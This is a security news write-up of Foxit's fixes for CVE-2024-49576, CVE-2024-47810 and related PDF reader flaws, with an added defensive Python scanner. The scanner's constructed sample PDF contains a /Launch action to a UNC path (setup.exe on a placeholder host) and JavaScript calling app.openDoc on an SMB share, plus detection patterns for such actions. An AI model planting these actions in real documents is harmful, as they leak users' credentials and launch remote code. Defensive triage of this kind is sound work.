CVE-2024-49576 and CVE-2024-47810: Foxit Addresses Remote Code Execution Flaws
Foxit has released a crucial security update for its widely used Foxit PDF Reader and Foxit PDF Editor. The update, version 2024.4, resolves multiple vulnerabilities that pose significant risks, including remote code execution, privilege escalation, and information disclosure.
The security bulletin identifies several vulnerabilities affecting earlier versions of Foxit PDF Reader and Editor. These include:
- Untrusted URL Invocation: Attackers could exploit this flaw by embedding malicious code or images in PDF documents. As Foxit explained, “This occurs as the application loads images from all resources (including those untrusted) when parsing the image resources or fails to properly request user confirmation before getting or posting content from external HTTP servers.”
- Incorrect Signature Verification: Manipulated XFA documents could deceive users into signing altered documents. Foxit notes, “The application improperly ignores the changes to the ‘/NeedsRendering’ key or ‘TextField’ field when verifying the XFA documents.”
- Information Disclosure: Flaws in the “app.openDoc” and “LaunchAction” functions allowed attackers to exfiltrate sensitive data from the file system or SMB servers. The bulletin highlights that the application “fails to provide a reasonable prompt for user confirmation” in these scenarios.
- Use-After-Free Vulnerabilities: Use-after-free bugs in the handling of certain AcroForms and 3D page objects could crash the application and, with a crafted document, lead to remote code execution. CVE-2024-49576 and CVE-2024-47810 are tracked in this category.
- DLL Hijacking and Privilege Escalation: Improper validation of the DLL search path and of the update mechanism could allow a local attacker to execute arbitrary code with SYSTEM privileges.
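The URL-invocation, LaunchAction and app.openDoc issues above share one trait a defender can look for before a reader ever opens the file: a document action whose target is an external HTTP resource or a UNC path (which makes Windows open an SMB connection to an attacker-controlled host). The following triage script is an added example written for this page; it is not Foxit's code and does not come from the bulletin. It scans a PDF's raw bytes for /Launch, /URI and /JavaScript actions and reports which ones point at HTTP or SMB targets or call app.openDoc. The sample PDF, the host 10.0.0.5 and the URL are constructed placeholders, and the regex-based parsing is a heuristic assumption rather than a full PDF parser.

```python
import re

# Constructed sample PDF for the demo (not a real exploit file): an OpenAction that
# /Launch-es a UNC path, a link annotation whose JavaScript calls app.openDoc on an
# SMB share, a /URI action to an HTTP resource, and one benign /GoTo action.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [5 0 R] >> endobj
4 0 obj << /Type /Action /S /Launch /F (\\\\10.0.0.5\\share\\setup.exe) >> endobj
5 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 100]
   /A << /S /JavaScript /JS (app.openDoc\("\\\\10.0.0.5\\share\\doc.pdf"\);) >> >> endobj
6 0 obj << /Type /Action /S /URI /URI (http://cdn.example.invalid/img.png) >> endobj
7 0 obj << /Type /Action /S /GoTo /D [3 0 R /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Indirect objects, so each finding can name the object it came from.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
# The action types the bulletin calls out; /GoTo and friends are ignored.
ACTION_RE = re.compile(rb"/S\s*/(Launch|URI|JavaScript)\b")
# PDF literal strings: ( ... ) with backslash escapes. Nested parentheses are
# not handled (a simplifying assumption of this heuristic scanner).
STRING_RE = re.compile(rb"\((?:\\.|[^\\)])*\)", re.S)
# \\host\share...: opening this makes Windows talk SMB to "host".
UNC_RE = re.compile(rb"\\\\[\w.-]+\\[^\s\"')]+")
HTTP_RE = re.compile(rb"https?://[^\s\"')]+", re.I)


def pdf_unescape(s: bytes) -> bytes:
    """Undo the PDF literal-string escapes that matter here: \\\\, \\( and \\)."""
    return re.sub(rb"\\([\\()])", rb"\1", s)


def scan_pdf(data: bytes) -> list[dict]:
    """Return one finding per object that carries a risky action."""
    findings = []
    for m in OBJ_RE.finditer(data):
        objnum, body = int(m.group(1)), m.group(3)
        actions = [a.decode() for a in ACTION_RE.findall(body)]
        if not actions:
            continue
        # Whatever the action reaches lives in literal strings: /F, /URI, /JS.
        text = b" ".join(pdf_unescape(s[1:-1]) for s in STRING_RE.findall(body))
        reasons = []
        if UNC_RE.search(text):
            reasons.append("unc")       # SMB target: credential/data leak
        if HTTP_RE.search(text):
            reasons.append("http")      # external fetch without confirmation
        if b"app.openDoc" in text:
            reasons.append("openDoc")   # opens another document from the script
        findings.append({"obj": objnum, "actions": actions,
                         "target": text.decode("latin-1"), "reasons": reasons})
    return findings


def verdict(findings: list[dict]) -> str:
    """Collapse findings to a triage decision: block, review or clean."""
    reasons = {r for f in findings for r in f["reasons"]}
    if reasons & {"unc", "openDoc"}:
        return "block"
    if "http" in reasons:
        return "review"
    return "clean"


if __name__ == "__main__":
    results = scan_pdf(SAMPLE_PDF)
    for f in results:
        print(f"obj {f['obj']}: {f['actions']} -> {f['reasons']}: {f['target']}")
    print("verdict:", verdict(results))
```

The scanner only sees actions stored in plain indirect objects; a file that hides its catalog and action dictionaries inside a compressed object stream (/ObjStm) needs to be decompressed first, which is the usual next step in a real triage pipeline. A hit on a UNC target is worth blocking regardless of reader version, since the SMB connection leaks the user's NTLM credentials to the named host as soon as the action fires.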
Foxit acknowledged contributions from security researchers, including Jörn Henkel, Mat Powell from Trend Micro Zero Day Initiative, and KPC of Cisco Talos.
The vulnerabilities impact:
- Foxit PDF Reader: Versions 2024.3.0.26795 and earlier.
- Foxit PDF Editor: A range of versions from 11.x to 2024.3.
These vulnerabilities affect Windows platforms, and users are encouraged to upgrade to version 2024.4 or later immediately.